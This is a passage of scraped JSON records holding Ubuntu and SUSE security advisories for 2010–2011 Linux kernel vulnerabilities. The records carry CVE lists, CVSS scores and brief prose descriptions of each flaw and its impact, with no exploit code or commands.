user could cause a denial of service via a NULL pointer \ndereference, escalate privileges by overflowing the kernel stack, and \nassign Econet addresses to arbitrary interfaces. (CVE-2010-3848, \nCVE-2010-3849, CVE-2010-3850)\n\nBen Hawkes discovered that the Linux kernel did not correctly filter \nregisters on 64bit kernels when performing 32bit system calls. On a 64bit \nsystem, a local attacker could manipulate 32bit system calls to gain root \nprivileges. (CVE-2010-3301)\n\nBen Hawkes discovered that the Linux kernel did not correctly validate \nmemory ranges on 64bit kernels when allocating memory on behalf of 32bit \nsystem calls. On a 64bit system, a local attacker could perform malicious \nmulticast getsockopt calls to gain root privileges. (CVE-2010-3081)\n\nAl Viro discovered a race condition in the TTY driver. A local attacker \ncould exploit this to crash the system, leading to a denial of service. \n(CVE-2009-4895)\n\nDan Rosenberg discovered that the MOVE_EXT ext4 ioctl did not correctly \ncheck file permissions. A local attacker could overwrite append-only files, \nleading to potential data loss. (CVE-2010-2066)\n\nDan Rosenberg discovered that the swapexit xfs ioctl did not correctly \ncheck file permissions. A local attacker could exploit this to read from \nwrite-only files, leading to a loss of privacy. (CVE-2010-2226)\n\nSuresh Jayaraman discovered that CIFS did not correctly validate certain \nresponse packats. A remote attacker could send specially crafted traffic \nthat would crash the system, leading to a denial of service. \n(CVE-2010-2248)\n\nBen Hutchings discovered that the ethtool interface did not correctly check \ncertain sizes. A local attacker could perform malicious ioctl calls that \ncould crash the system, leading to a denial of service. (CVE-2010-2478, \nCVE-2010-3084)\n\nJames Chapman discovered that L2TP did not correctly evaluate checksum \ncapabilities. If an attacker could make malicious routing changes, they \ncould crash the system, leading to a denial of service. (CVE-2010-2495)\n\nNeil Brown discovered that NFSv4 did not correctly check certain write \nrequests. A remote attacker could send specially crafted traffic that could \ncrash the system or possibly gain root privileges. (CVE-2010-2521)\n\nDavid Howells discovered that DNS resolution in CIFS could be spoofed. A \nlocal attacker could exploit this to control DNS replies, leading to a loss \nof privacy and possible privilege escalation. (CVE-2010-2524)\n\nDan Rosenberg discovered that the btrfs filesystem did not correctly \nvalidate permissions when using the clone function. A local attacker could \noverwrite the contents of file handles that were opened for append-only, or \npotentially read arbitrary contents, leading to a loss of privacy. \n(CVE-2010-2538)\n\nBob Peterson discovered that GFS2 rename operations did not correctly \nvalidate certain sizes. A local attacker could exploit this to crash the \nsystem, leading to a denial of service. (CVE-2010-2798)\n\nEric Dumazet discovered that many network functions could leak kernel stack \ncontents. A local attacker could exploit this to read portions of kernel \nmemory, leading to a loss of privacy. (CVE-2010-2942, CVE-2010-3477)\n\nDave Chinner discovered that the XFS filesystem did not correctly order \ninode lookups when exported by NFS. A remote attacker could exploit this to \nread or write disk blocks that had changed file assignment or had become \nunlinked, leading to a loss of privacy. (CVE-2010-2943)\n\nSergey Vlasov discovered that JFS did not correctly handle certain extended \nattributes. A local attacker could bypass namespace access rules, leading \nto a loss of privacy. (CVE-2010-2946)\n\nTavis Ormandy discovered that the IRDA subsystem did not correctly shut \ndown. A local attacker could exploit this to cause the system to crash or \npossibly gain root privileges. (CVE-2010-2954)\n\nBrad Spengler discovered that the wireless extensions did not correctly \nvalidate certain request sizes. A local attacker could exploit this to read \nportions of kernel memory, leading to a loss of privacy. (CVE-2010-2955)\n\nKees Cook discovered that the Intel i915 graphics driver did not correctly \nvalidate memory regions. A local attacker with access to the video card \ncould read and write arbitrary kernel memory to gain root privileges. \n(CVE-2010-2962)\n\nKees Cook discovered that the V4L1 32bit compat interface did not correctly \nvalidate certain parameters. A local attacker on a 64bit system with access \nto a video device could exploit this to gain root privileges. \n(CVE-2010-2963)\n\nToshiyuki Okajima discovered that ext4 did not correctly check certain \nparameters. A local attacker could exploit this to crash the system or \noverwrite the last block of large files. (CVE-2010-3015)\n\nTavis Ormandy discovered that the AIO subsystem did not correctly validate \ncertain parameters. A local attacker could exploit this to crash the system \nor possibly gain root privileges. (CVE-2010-3067)\n\nDan Rosenberg discovered that certain XFS ioctls leaked kernel stack \ncontents. A local attacker could exploit this to read portions of kernel \nmemory, leading to a loss of privacy. (CVE-2010-3078)\n\nRobert Swiecki discovered that ftrace did not correctly handle mutexes. A \nlocal attacker could exploit this to crash the kernel, leading to a denial \nof service. (CVE-2010-3079)\n\nTavis Ormandy discovered that the OSS sequencer device did not correctly \nshut down. A local attacker could exploit this to crash the system or \npossibly gain root privileges. (CVE-2010-3080)\n\nDan Rosenberg discovered that several network ioctls did not clear kernel \nmemory correctly. A local user could exploit this to read kernel stack \nmemory, leading to a loss of privacy. (CVE-2010-3296, CVE-2010-3297, \nCVE-2010-3298)\n\nDan Rosenberg discovered that the ROSE driver did not correctly check \nparameters. A local attacker with access to a ROSE network device could \nexploit this to crash the system or possibly gain root privileges. \n(CVE-2010-3310)\n\nThomas Dreibholz discovered that SCTP did not correctly handle appending \npacket chunks. A remote attacker could send specially crafted traffic to \ncrash the system, leading to a denial of service. (CVE-2010-3432)\n\nDan Rosenberg discovered that the CD driver did not correctly check \nparameters. A local attacker could exploit this to read arbitrary kernel \nmemory, leading to a loss of privacy. (CVE-2010-3437)\n\nDan Rosenberg discovered that the Sound subsystem did not correctly \nvalidate parameters. A local attacker could exploit this to crash the \nsystem, leading to a denial of service. (CVE-2010-3442)\n\nDan Jacobson discovered that ThinkPad video output was not correctly access \ncontrolled. A local attacker could exploit this to hang the system, leading \nto a denial of service. (CVE-2010-3448)\n\nIt was discovered that KVM did not correctly initialize certain CPU \nregisters. A local attacker could exploit this to crash the system, leading \nto a denial of service. (CVE-2010-3698)\n\nDan Rosenberg discovered that SCTP did not correctly handle HMAC \ncalculations. A remote attacker could send specially crafted traffic that \nwould crash the system, leading to a denial of service. (CVE-2010-3705)\n\nBrad Spengler discovered that stack memory for new a process was not \ncorrectly calculated. A local attacker could exploit this to crash the \nsystem, leading to a denial of service. (CVE-2010-3858)\n\nKees Cook discovered that the ethtool interface did not correctly clear \nkernel memory. A local attacker could read kernel heap memory, leading to a \nloss of privacy. (CVE-2010-3861)\n\nKees Cook and Vasiliy Kulikov discovered that the shm interface did not \nclear kernel memory correctly. A local attacker could exploit this to read \nkernel stack memory, leading to a loss of privacy. (CVE-2010-4072)\n\nDan Rosenberg discovered that IPC structures were not correctly initialized \non 64bit systems. A local attacker could exploit this to read kernel stack \nmemory, leading to a loss of privacy. (CVE-2010-4073)\n\nDan Rosenberg discovered that the USB subsystem did not correctly \ninitialize certian structures. A local attacker could exploit this to read \nkernel stack memory, leading to a loss of privacy. (CVE-2010-4074)\n\nDan Rosenberg discovered that the SiS video driver did not correctly clear \nkernel memory. A local attacker could exploit this to read kernel stack \nmemory, leading to a loss of privacy. (CVE-2010-4078)\n\nDan Rosenberg discovered that the ivtv V4L driver did not correctly \ninitialize certian structures. A local attacker could exploit this to read \nkernel stack memory, leading to a loss of privacy. (CVE-2010-4079)\n\nSteve Chen discovered that setsockopt did not correctly check MSS values. A \nlocal attacker could make a specially crafted socket call to crash the \nsystem, leading to a denial of service. (CVE-2010-4165)\n\nDave Jones discovered that the mprotect system call did not correctly \nhandle merged VMAs. A local attacker could exploit this to crash the \nsystem, leading to a denial of service. (CVE-2010-4169)\n\nVegard Nossum discovered that memory garbage collection was not handled \ncorrectly for active sockets. A local attacker could exploit this to \nallocate all available kernel memory, leading to a denial of service. \n(CVE-2010-4249)\n\nJoel Becker discovered that OCFS2 did not correctly validate on-disk \nsymlink structures. If an attacker were able to trick a user or automated \nsystem into mounting a specially crafted filesystem, it could crash the \nsystem or expose kernel memory, leading to a loss of privacy. \n(CVE-2010-NNN2)", "edition": 5, "modified": "2011-02-28T00:00:00", "published": "2011-02-28T00:00:00", "id": "USN-1074-2", "href": "https://ubuntu.com/security/notices/USN-1074-2", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:22:53", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2942", "CVE-2010-3904", "CVE-2010-3078", "CVE-2010-2066", "CVE-2010-3297", "CVE-2010-2248", "CVE-2010-4073", "CVE-2010-2226", "CVE-2010-4165", "CVE-2010-4072", "CVE-2010-2955", "CVE-2010-2946", "CVE-2009-4895", "CVE-2010-3437", "CVE-2010-4074", "CVE-2010-2521", "CVE-2010-2943", "CVE-2010-3477", "CVE-2010-4169", "CVE-2010-3310", "CVE-2010-2963", "CVE-2010-2959", "CVE-2010-2524", "CVE-2010-3296", "CVE-2010-2478", "CVE-2010-3698", "CVE-2010-3850", "CVE-2010-3015", "CVE-2010-2495", "CVE-2010-3442", "CVE-2010-3705", "CVE-2010-3848", "CVE-2010-2954", "CVE-2010-2240", "CVE-2010-4079", "CVE-2010-4249", "CVE-2010-3081", "CVE-2010-3858", "CVE-2010-3067", "CVE-2010-2803", "CVE-2010-3084", "CVE-2010-2798", "CVE-2010-2962", "CVE-2010-3448", "CVE-2010-3080", "CVE-2010-3432", "CVE-2010-3298", "CVE-2010-4078", "CVE-2010-3849", "CVE-2010-3079", "CVE-2010-2538", "CVE-2010-3861", "CVE-2010-3301"], "description": "Al Viro discovered a race condition in the TTY driver. A local attacker \ncould exploit this to crash the system, leading to a denial of service. \n(CVE-2009-4895)\n\nDan Rosenberg discovered that the MOVE_EXT ext4 ioctl did not correctly \ncheck file permissions. A local attacker could overwrite append-only files, \nleading to potential data loss. (CVE-2010-2066)\n\nDan Rosenberg discovered that the swapexit xfs ioctl did not correctly \ncheck file permissions. A local attacker could exploit this to read from \nwrite-only files, leading to a loss of privacy. (CVE-2010-2226)\n\nGael Delalleu, Rafal Wojtczuk, and Brad Spengler discovered that the memory \nmanager did not properly handle when applications grow stacks into adjacent \nmemory regions. A local attacker could exploit this to gain control of \ncertain applications, potentially leading to privilege escalation, as \ndemonstrated in attacks against the X server. (CVE-2010-2240)\n\nSuresh Jayaraman discovered that CIFS did not correctly validate certain \nresponse packats. A remote attacker could send specially crafted traffic \nthat would crash the system, leading to a denial of service. \n(CVE-2010-2248)\n\nBen Hutchings discovered that the ethtool interface did not correctly check \ncertain sizes. A local attacker could perform malicious ioctl calls that \ncould crash the system, leading to a denial of service. (CVE-2010-2478, \nCVE-2010-3084)\n\nJames Chapman discovered that L2TP did not correctly evaluate checksum \ncapabilities. If an attacker could make malicious routing changes, they \ncould crash the system, leading to a denial of service. (CVE-2010-2495)\n\nNeil Brown discovered that NFSv4 did not correctly check certain write \nrequests. A remote attacker could send specially crafted traffic that could \ncrash the system or possibly gain root privileges. (CVE-2010-2521)\n\nDavid Howells discovered that DNS resolution in CIFS could be spoofed. A \nlocal attacker could exploit this to control DNS replies, leading to a loss \nof privacy and possible privilege escalation. (CVE-2010-2524)\n\nDan Rosenberg discovered that the btrfs filesystem did not correctly \nvalidate permissions when using the clone function. A local attacker could \noverwrite the contents of file handles that were opened for append-only, or \npotentially read arbitrary contents, leading to a loss of privacy. Only \nUbuntu 9.10 was affected. (CVE-2010-2538)\n\nBob Peterson discovered that GFS2 rename operations did not correctly \nvalidate certain sizes. A local attacker could exploit this to crash the \nsystem, leading to a denial of service. (CVE-2010-2798)\n\nKees Cook discovered that under certain situations the ioctl subsystem for \nDRM did not properly sanitize its arguments. A local attacker could exploit \nthis to read previously freed kernel memory, leading to a loss of privacy. \n(CVE-2010-2803)\n\nEric Dumazet discovered that many network functions could leak kernel stack \ncontents. A local attacker could exploit this to read portions of kernel \nmemory, leading to a loss of privacy. (CVE-2010-2942, CVE-2010-3477)\n\nDave Chinner discovered that the XFS filesystem did not correctly order \ninode lookups when exported by NFS. A remote attacker could exploit this to \nread or write disk blocks that had changed file assignment or had become \nunlinked, leading to a loss of privacy. (CVE-2010-2943)\n\nSergey Vlasov discovered that JFS did not correctly handle certain extended \nattributes. A local attacker could bypass namespace access rules, leading \nto a loss of privacy. (CVE-2010-2946)\n\nTavis Ormandy discovered that the IRDA subsystem did not correctly shut \ndown. A local attacker could exploit this to cause the system to crash or \npossibly gain root privileges. (CVE-2010-2954)\n\nBrad Spengler discovered that the wireless extensions did not correctly \nvalidate certain request sizes. A local attacker could exploit this to read \nportions of kernel memory, leading to a loss of privacy. (CVE-2010-2955)\n\nBen Hawkes discovered an integer overflow in the Controller Area Network \n(CVE-2010-2959)\n\nKees Cook discovered that the Intel i915 graphics driver did not correctly \nvalidate memory regions. A local attacker with access to the video card \ncould read and write arbitrary kernel memory to gain root privileges. \nUbuntu 10.10 was not affected. (CVE-2010-2962)\n\nKees Cook discovered that the V4L1 32bit compat interface did not correctly \nvalidate certain parameters. A local attacker on a 64bit system with access \nto a video device could exploit this to gain root privileges. \n(CVE-2010-2963)\n\nToshiyuki Okajima discovered that ext4 did not correctly check certain \nparameters. A local attacker could exploit this to crash the system or \noverwrite the last block of large files. (CVE-2010-3015)\n\nTavis Ormandy discovered that the AIO subsystem did not correctly validate \ncertain parameters. A local attacker could exploit this to crash the system \nor possibly gain root privileges. (CVE-2010-3067)\n\nDan Rosenberg discovered that certain XFS ioctls leaked kernel stack \ncontents. A local attacker could exploit this to read portions of kernel \nmemory, leading to a loss of privacy. (CVE-2010-3078)\n\nRobert Swiecki discovered that ftrace did not correctly handle mutexes. A \nlocal attacker could exploit this to crash the kernel, leading to a denial \nof service. (CVE-2010-3079)\n\nTavis Ormandy discovered that the OSS sequencer device did not correctly \nshut down. A local attacker could exploit this to crash the system or \npossibly gain root privileges. (CVE-2010-3080)\n\nBen Hawkes discovered that the Linux kernel did not correctly validate \nmemory ranges on 64bit kernels when allocating memory on behalf of 32bit \nsystem calls. On a 64bit system, a local attacker could perform malicious \nmulticast getsockopt calls to gain root privileges. (CVE-2010-3081)\n\nDan Rosenberg discovered that several network ioctls did not clear kernel \nmemory correctly. A local user could exploit this to read kernel stack \nmemory, leading to a loss of privacy. (CVE-2010-3296, CVE-2010-3297, \nCVE-2010-3298)\n\nBen Hawkes discovered that the Linux kernel did not correctly filter \nregisters on 64bit kernels when performing 32bit system calls. On a 64bit \nsystem, a local attacker could manipulate 32bit system calls to gain root \nprivileges. (CVE-2010-3301)\n\nDan Rosenberg discovered that the ROSE driver did not correctly check \nparameters. A local attacker with access to a ROSE network device could \nexploit this to crash the system or possibly gain root privileges. \n(CVE-2010-3310)\n\nThomas Dreibholz discovered that SCTP did not correctly handle appending \npacket chunks. A remote attacker could send specially crafted traffic to \ncrash the system, leading to a denial of service. (CVE-2010-3432)\n\nDan Rosenberg discovered that the CD driver did not correctly check \nparameters. A local attacker could exploit this to read arbitrary kernel \nmemory, leading to a loss of privacy. (CVE-2010-3437)\n\nDan Rosenberg discovered that the Sound subsystem did not correctly \nvalidate parameters. A local attacker could exploit this to crash the \nsystem, leading to a denial of service. (CVE-2010-3442)\n\nDan Jacobson discovered that ThinkPad video output was not correctly access \ncontrolled. A local attacker could exploit this to hang the system, leading \nto a denial of service. (CVE-2010-3448)\n\nIt was discovered that KVM did not correctly initialize certain CPU \nregisters. A local attacker could exploit this to crash the system, leading \nto a denial of service. (CVE-2010-3698)\n\nDan Rosenberg discovered that SCTP did not correctly handle HMAC \ncalculations. A remote attacker could send specially crafted traffic that \nwould crash the system, leading to a denial of service. (CVE-2010-3705)\n\nNelson Elhage discovered several problems with the Acorn Econet protocol \ndriver. A local user could cause a denial of service via a NULL pointer \ndereference, escalate privileges by overflowing the kernel stack, and \nassign Econet addresses to arbitrary interfaces. (CVE-2010-3848, \nCVE-2010-3849, CVE-2010-3850)\n\nBrad Spengler discovered that stack memory for new a process was not \ncorrectly calculated. A local attacker could exploit this to crash the \nsystem, leading to a denial of service. (CVE-2010-3858)\n\nKees Cook discovered that the ethtool interface did not correctly clear \nkernel memory. A local attacker could read kernel heap memory, leading to a \nloss of privacy. (CVE-2010-3861)\n\nDan Rosenberg discovered that the RDS network protocol did not correctly \ncheck certain parameters. A local attacker could exploit this gain root \nprivileges. (CVE-2010-3904)\n\nKees Cook and Vasiliy Kulikov discovered that the shm interface did not \nclear kernel memory correctly. A local attacker could exploit this to read \nkernel stack memory, leading to a loss of privacy. (CVE-2010-4072)\n\nDan Rosenberg discovered that IPC structures were not correctly initialized \non 64bit systems. A local attacker could exploit this to read kernel stack \nmemory, leading to a loss of privacy. (CVE-2010-4073)\n\nDan Rosenberg discovered that the USB subsystem did not correctly \ninitialize certian structures. A local attacker could exploit this to read \nkernel stack memory, leading to a loss of privacy. (CVE-2010-4074)\n\nDan Rosenberg discovered that the SiS video driver did not correctly clear \nkernel memory. A local attacker could exploit this to read kernel stack \nmemory, leading to a loss of privacy. (CVE-2010-4078)\n\nDan Rosenberg discovered that the ivtv V4L driver did not correctly \ninitialize certian structures. A local attacker could exploit this to read \nkernel stack memory, leading to a loss of privacy. (CVE-2010-4079)\n\nSteve Chen discovered that setsockopt did not correctly check MSS values. A \nlocal attacker could make a specially crafted socket call to crash the \nsystem, leading to a denial of service. (CVE-2010-4165)\n\nDave Jones discovered that the mprotect system call did not correctly \nhandle merged VMAs. A local attacker could exploit this to crash the \nsystem, leading to a denial of service. (CVE-2010-4169)\n\nVegard Nossum discovered that memory garbage collection was not handled \ncorrectly for active sockets. A local attacker could exploit this to \nallocate all available kernel memory, leading to a denial of service. \n(CVE-2010-4249)", "edition": 5, "modified": "2011-02-25T00:00:00", "published": "2011-02-25T00:00:00", "id": "USN-1074-1", "href": "https://ubuntu.com/security/notices/USN-1074-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:28:28", "bulletinFamily": "unix", "cvelist": ["CVE-2010-3904", "CVE-2010-3865", "CVE-2010-4529", "CVE-2010-4165", "CVE-2010-2960", "CVE-2010-4072", "CVE-2010-3881", "CVE-2010-4346", "CVE-2010-2955", "CVE-2010-3437", "CVE-2010-4527", "CVE-2010-2963", "CVE-2010-3877", "CVE-2010-3875", "CVE-2010-4158", "CVE-2010-3876", "CVE-2010-3850", "CVE-2010-4258", "CVE-2010-3705", "CVE-2010-3848", "CVE-2010-2954", "CVE-2010-4079", "CVE-2010-4249", "CVE-2010-3081", "CVE-2010-4342", "CVE-2010-4164", "CVE-2010-2962", "CVE-2010-3080", "CVE-2010-3849", "CVE-2010-3079", "CVE-2010-3861"], "description": "Dan Rosenberg discovered that the RDS network protocol did not correctly \ncheck certain parameters. A local attacker could exploit this gain root \nprivileges. (CVE-2010-3904)\n\nNelson Elhage discovered several problems with the Acorn Econet protocol \ndriver. A local user could cause a denial of service via a NULL pointer \ndereference, escalate privileges by overflowing the kernel stack, and \nassign Econet addresses to arbitrary interfaces. (CVE-2010-3848, \nCVE-2010-3849, CVE-2010-3850)\n\nBen Hawkes discovered that the Linux kernel did not correctly validate \nmemory ranges on 64bit kernels when allocating memory on behalf of 32bit \nsystem calls. On a 64bit system, a local attacker could perform malicious \nmulticast getsockopt calls to gain root privileges. (CVE-2010-3081)\n\nTavis Ormandy discovered that the IRDA subsystem did not correctly shut \ndown. A local attacker could exploit this to cause the system to crash or \npossibly gain root privileges. (CVE-2010-2954)\n\nBrad Spengler discovered that the wireless extensions did not correctly \nvalidate certain request sizes. A local attacker could exploit this to read \nportions of kernel memory, leading to a loss of privacy. (CVE-2010-2955)\n\nTavis Ormandy discovered that the session keyring did not correctly check \nfor its parent. On systems without a default session keyring, a local \nattacker could exploit this to crash the system, leading to a denial of \nservice. (CVE-2010-2960)\n\nKees Cook discovered that the Intel i915 graphics driver did not correctly \nvalidate memory regions. A local attacker with access to the video card \ncould read and write arbitrary kernel memory to gain root privileges. \n(CVE-2010-2962)\n\nKees Cook discovered that the V4L1 32bit compat interface did not correctly \nvalidate certain parameters. A local attacker on a 64bit system with access \nto a video device could exploit this to gain root privileges. \n(CVE-2010-2963)\n\nRobert Swiecki discovered that ftrace did not correctly handle mutexes. A \nlocal attacker could exploit this to crash the kernel, leading to a denial \nof service. (CVE-2010-3079)\n\nTavis Ormandy discovered that the OSS sequencer device did not correctly \nshut down. A local attacker could exploit this to crash the system or \npossibly gain root privileges. (CVE-2010-3080)\n\nDan Rosenberg discovered that the CD driver did not correctly check \nparameters. A local attacker could exploit this to read arbitrary kernel \nmemory, leading to a loss of privacy. (CVE-2010-3437)\n\nDan Rosenberg discovered that SCTP did not correctly handle HMAC \ncalculations. A remote attacker could send specially crafted traffic that \nwould crash the system, leading to a denial of service. (CVE-2010-3705)\n\nKees Cook discovered that the ethtool interface did not correctly clear \nkernel memory. A local attacker could read kernel heap memory, leading to a \nloss of privacy. (CVE-2010-3861)\n\nThomas Pollet discovered that the RDS network protocol did not check \ncertain iovec buffers. A local attacker could exploit this to crash the \nsystem or possibly execute arbitrary code as the root user. (CVE-2010-3865)\n\nVasiliy Kulikov discovered that the Linux kernel X.25 implementation did \nnot correctly clear kernel memory. A local attacker could exploit this to \nread kernel stack memory, leading to a loss of privacy. (CVE-2010-3875)\n\nVasiliy Kulikov discovered that the Linux kernel sockets implementation did \nnot properly initialize certain structures. A local attacker could exploit \nthis to read kernel stack memory, leading to a loss of privacy. \n(CVE-2010-3876)\n\nVasiliy Kulikov discovered that the TIPC interface did not correctly \ninitialize certain structures. A local attacker could exploit this to read \nkernel stack memory, leading to a loss of privacy. (CVE-2010-3877)\n\nVasiliy Kulikov discovered that kvm did not correctly clear memory. A local \nattacker could exploit this to read portions of the kernel stack, leading \nto a loss of privacy. (CVE-2010-3881)\n\nKees Cook and Vasiliy Kulikov discovered that the shm interface did not \nclear kernel memory correctly. A local attacker could exploit this to read \nkernel stack memory, leading to a loss of privacy. (CVE-2010-4072)\n\nDan Rosenberg discovered that the ivtv V4L driver did not correctly \ninitialize certian structures. A local attacker could exploit this to read \nkernel stack memory, leading to a loss of privacy. (CVE-2010-4079)\n\nDan Rosenberg discovered that the socket filters did not correctly \ninitialize structure memory. A local attacker could create malicious \nfilters to read portions of kernel stack memory, leading to a loss of \nprivacy. (CVE-2010-4158)\n\nDan Rosenberg discovered multiple flaws in the X.25 facilities parsing. If \na system was using X.25, a remote attacker could exploit this to crash the \nsystem, leading to a denial of service. (CVE-2010-4164)\n\nSteve Chen discovered that setsockopt did not correctly check MSS values. A \nlocal attacker could make a specially crafted socket call to crash the \nsystem, leading to a denial of service. (CVE-2010-4165)\n\nVegard Nossum discovered that memory garbage collection was not handled \ncorrectly for active sockets. A local attacker could exploit this to \nallocate all available kernel memory, leading to a denial of service. \n(CVE-2010-4249)\n\nNelson Elhage discovered that the kernel did not correctly handle process \ncleanup after triggering a recoverable kernel bug. If a local attacker were \nable to trigger certain kinds of kernel bugs, they could create a specially \ncrafted process to gain root privileges. (CVE-2010-4258)\n\nNelson Elhage discovered that Econet did not correctly handle AUN packets \nover UDP. A local attacker could send specially crafted traffic to crash \nthe system, leading to a denial of service. (CVE-2010-4342)\n\nTavis Ormandy discovered that the install_special_mapping function could \nbypass the mmap_min_addr restriction. A local attacker could exploit this \nto mmap 4096 bytes below the mmap_min_addr area, possibly improving the \nchances of performing NULL pointer dereference attacks. (CVE-2010-4346)\n\nDan Rosenberg discovered that the OSS subsystem did not handle name \ntermination correctly. A local attacker could exploit this crash the system \nor gain root privileges. (CVE-2010-4527)\n\nDan Rosenberg discovered that IRDA did not correctly check the size of \nbuffers. On non-x86 systems, a local attacker could exploit this to read \nkernel heap memory, leading to a loss of privacy. (CVE-2010-4529)", "edition": 5, "modified": "2011-04-20T00:00:00", "published": "2011-04-20T00:00:00", "id": "USN-1119-1", "href": "https://ubuntu.com/security/notices/USN-1119-1", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:05:08", "bulletinFamily": "unix", "cvelist": ["CVE-2010-4163", "CVE-2010-4073", "CVE-2010-4165", "CVE-2010-4072", "CVE-2010-3881", "CVE-2010-3437", "CVE-2010-4083", "CVE-2010-4082", "CVE-2010-4169", "CVE-2010-4158", "CVE-2010-4162", "CVE-2010-4258", "CVE-2010-3874", "CVE-2010-4157", "CVE-2010-4160", "CVE-2010-4164", "CVE-2010-4175", "CVE-2010-3861"], "edition": 1, "description": "The SUSE Linux Enterprise 11 Service Pack 1 kernel was updated to 2.6.32.27 and fixes various bugs and security issues.\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2011-01-14T16:35:40", "published": "2011-01-14T16:35:40", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00004.html", "id": "SUSE-SA:2011:004", "type": "suse", "title": "local privilege escalation in kernel", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:46:49", "bulletinFamily": "unix", "cvelist": ["CVE-2010-4163", "CVE-2010-4081", "CVE-2010-3865", "CVE-2010-4073", "CVE-2010-4165", "CVE-2010-4072", "CVE-2010-3437", "CVE-2010-4083", "CVE-2010-4082", "CVE-2010-0435", "CVE-2010-4080", "CVE-2010-4169", "CVE-2010-4158", "CVE-2010-4162", "CVE-2010-4258", "CVE-2010-3442", "CVE-2010-3874", "CVE-2010-4157", "CVE-2010-4347", "CVE-2010-3067", "CVE-2010-4164", "CVE-2010-3432", "CVE-2010-4078", "CVE-2010-4175", "CVE-2010-3861"], "description": "The openSUSE 11.3 kernel was updated to fix various bugs and security issues. Following security issues have been fixed: CVE-2010-4347: A local user could inject ACPI code into the kernel via the world-writable \"custom_debug\" file, allowing local privilege escalation.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2011-01-03T15:33:10", "published": "2011-01-03T15:33:10", "id": "SUSE-SA:2011:001", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00000.html", "type": "suse", "title": "local privilege escalation, remote denial of in kernel", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:09:51", "bulletinFamily": "unix", "cvelist": ["CVE-2010-4163", "CVE-2010-4081", "CVE-2010-3865", "CVE-2010-4165", "CVE-2010-3437", "CVE-2010-4082", "CVE-2010-4080", "CVE-2010-4158", "CVE-2010-4162", "CVE-2010-4258", "CVE-2010-3442", "CVE-2010-3874", "CVE-2010-4157", "CVE-2010-4160", "CVE-2010-3067", "CVE-2010-4164", "CVE-2010-4078", "CVE-2010-4175", "CVE-2010-3861"], "description": "This update of the openSUSE 11.2 kernel fixes various bugs and lots of security issues.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2011-01-03T15:33:25", "published": "2011-01-03T15:33:25", "id": "SUSE-SA:2011:002", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00001.html", "type": "suse", "title": "potential local privilege escalation in kernel", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:15:22", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2942", "CVE-2010-4163", "CVE-2010-3904", "CVE-2010-3078", "CVE-2010-4081", "CVE-2010-3865", "CVE-2010-3297", "CVE-2010-4073", "CVE-2010-2226", "CVE-2010-4165", "CVE-2010-2960", "CVE-2010-4072", "CVE-2010-3881", "CVE-2010-2955", "CVE-2010-2946", "CVE-2010-3437", "CVE-2010-4083", "CVE-2010-4082", "CVE-2010-4080", "CVE-2010-4169", "CVE-2010-3310", "CVE-2010-2959", "CVE-2010-4158", "CVE-2010-3296", "CVE-2010-3850", "CVE-2010-3015", "CVE-2010-4162", "CVE-2010-4258", "CVE-2010-3442", "CVE-2010-3848", "CVE-2010-2954", "CVE-2010-3874", "CVE-2010-4157", "CVE-2010-3081", "CVE-2010-4347", "CVE-2010-3067", "CVE-2010-2803", "CVE-2010-3084", "CVE-2010-4164", "CVE-2010-2962", "CVE-2010-3080", "CVE-2010-3432", "CVE-2010-3298", "CVE-2010-4078", "CVE-2010-3849", "CVE-2010-3079", "CVE-2010-4175", "CVE-2010-3861", "CVE-2010-3301"], "description": "This update to the SUSE Linux Enterprise 11 SP 1 Realtime Extension kernel brings various bug and lots of security fixes.\n#### Solution\nPlease install the updated packages.", "edition": 1, "modified": "2011-02-07T11:58:56", "published": "2011-02-07T11:58:56", "id": "SUSE-SA:2011:007", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-02/msg00000.html", "type": "suse", "title": "remote denial of service, local privilege in kernel-rt", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:22:07", "bulletinFamily": "unix", "cvelist": ["CVE-2010-4163", "CVE-2010-4529", "CVE-2010-4668", "CVE-2010-4346", "CVE-2010-4527", "CVE-2010-2943", "CVE-2010-3877", "CVE-2010-3875", "CVE-2010-3876", "CVE-2011-0006", "CVE-2010-4526", "CVE-2011-0711", "CVE-2010-4650", "CVE-2011-0710", "CVE-2011-0712", "CVE-2010-3705", "CVE-2010-4243", "CVE-2010-4342", "CVE-2010-3858", "CVE-2010-3699", "CVE-2010-4077", "CVE-2010-4075", "CVE-2010-4076"], "description": "The SUSE Linux Enterprise 11 Service Pack 1 kernel was updated to 2.6.32.29 and fixes various bugs and security issues.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2011-03-08T16:13:04", "published": "2011-03-08T16:13:04", "id": "SUSE-SA:2011:012", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-03/msg00001.html", "type": "suse", "title": "remote denial of service, local privilege in kernel", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], 